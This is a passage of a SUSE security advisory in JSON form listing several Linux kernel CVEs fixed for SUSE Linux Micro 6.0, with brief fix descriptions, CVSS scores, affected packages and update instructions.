"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40329"
},
{
"cve": "CVE-2025-40331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: Prevent TOCTOU out-of-bounds write\n\nFor the following path not holding the sock lock,\n\n sctp_diag_dump() -\u003e sctp_for_each_endpoint() -\u003e sctp_ep_dump()\n\nmake sure not to exceed bounds in case the address list has grown\nbetween buffer allocation (time-of-check) and write (time-of-use).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40331",
"url": "https://www.suse.com/security/cve/CVE-2025-40331"
},
{
"category": "external",
"summary": "SUSE Bug 1254615 for CVE-2025-40331",
"url": "https://bugzilla.suse.com/1254615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40331"
},
{
"cve": "CVE-2025-40337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: Correctly handle Rx checksum offload errors\n\nThe stmmac_rx function would previously set skb-\u003eip_summed to\nCHECKSUM_UNNECESSARY if hardware checksum offload (CoE) was enabled\nand the packet was of a known IP ethertype.\n\nHowever, this logic failed to check if the hardware had actually\nreported a checksum error. The hardware status, indicating a header or\npayload checksum failure, was being ignored at this stage. This could\ncause corrupt packets to be passed up the network stack as valid.\n\nThis patch corrects the logic by checking the `csum_none` status flag,\nwhich is set when the hardware reports a checksum error. If this flag\nis set, skb-\u003eip_summed is now correctly set to CHECKSUM_NONE,\nensuring the kernel\u0027s network stack will perform its own validation and\nproperly handle the corrupt packet.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40337",
"url": "https://www.suse.com/security/cve/CVE-2025-40337"
},
{
"category": "external",
"summary": "SUSE Bug 1255081 for CVE-2025-40337",
"url": "https://bugzilla.suse.com/1255081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40337"
},
{
"cve": "CVE-2025-40338",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40338"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: avs: Do not share the name pointer between components\n\nBy sharing \u0027name\u0027 directly, tearing down components may lead to\nuse-after-free errors. Duplicate the name to avoid that.\n\nAt the same time, update the order of operations - since commit\ncee28113db17 (\"ASoC: dmaengine_pcm: Allow passing component name via\nconfig\") the framework does not override component-\u003ename if set before\ninvoking the initializer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40338",
"url": "https://www.suse.com/security/cve/CVE-2025-40338"
},
{
"category": "external",
"summary": "SUSE Bug 1255273 for CVE-2025-40338",
"url": "https://bugzilla.suse.com/1255273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40338"
},
{
"cve": "CVE-2025-40339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix nullptr err of vm_handle_moved\n\nIf a amdgpu_bo_va is fpriv-\u003eprt_va, the bo of this one is always NULL.\nSo, such kind of amdgpu_bo_va should be updated separately before\namdgpu_vm_handle_moved.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40339",
"url": "https://www.suse.com/security/cve/CVE-2025-40339"
},
{
"category": "external",
"summary": "SUSE Bug 1255428 for CVE-2025-40339",
"url": "https://bugzilla.suse.com/1255428"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40339"
},
{
"cve": "CVE-2025-40342",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40342"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-fc: use lock accessing port_state and rport state\n\nnvme_fc_unregister_remote removes the remote port on a lport object at\nany point in time when there is no active association. This races with\nwith the reconnect logic, because nvme_fc_create_association is not\ntaking a lock to check the port_state and atomically increase the\nactive count on the rport.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40342",
"url": "https://www.suse.com/security/cve/CVE-2025-40342"
},
{
"category": "external",
"summary": "SUSE Bug 1255274 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "external",
"summary": "SUSE Bug 1255275 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255275"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40342"
},
{
"cve": "CVE-2025-40343",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40343"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-fc: avoid scheduling association deletion twice\n\nWhen forcefully shutting down a port via the configfs interface,\nnvmet_port_subsys_drop_link() first calls nvmet_port_del_ctrls() and\nthen nvmet_disable_port(). Both functions will eventually schedule all\nremaining associations for deletion.\n\nThe current implementation checks whether an association is about to be\nremoved, but only after the work item has already been scheduled. As a\nresult, it is possible for the first scheduled work item to free all\nresources, and then for the same work item to be scheduled again for\ndeletion.\n\nBecause the association list is an RCU list, it is not possible to take\na lock and remove the list entry directly, so it cannot be looked up\nagain. Instead, a flag (terminating) must be used to determine whether\nthe association is already in the process of being deleted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40343",
"url": "https://www.suse.com/security/cve/CVE-2025-40343"
},
{
"category": "external",
"summary": "SUSE Bug 1255276 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "external",
"summary": "SUSE Bug 1255278 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255278"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40343"
},
{
"cve": "CVE-2025-40345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: storage: sddr55: Reject out-of-bound new_pba\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nnew_pba comes from the status packet returned after each write.\nA bogus device could report values beyond the block count derived\nfrom info-\u003ecapacity, letting the driver walk off the end of\npba_to_lba[] and corrupt heap memory.\n\nReject PBAs that exceed the computed block count and fail the\ntransfer so we avoid touching out-of-range mapping entries.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40345",
"url": "https://www.suse.com/security/cve/CVE-2025-40345"
},
{
"category": "external",
"summary": "SUSE Bug 1255279 for CVE-2025-40345",
"url": "https://bugzilla.suse.com/1255279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
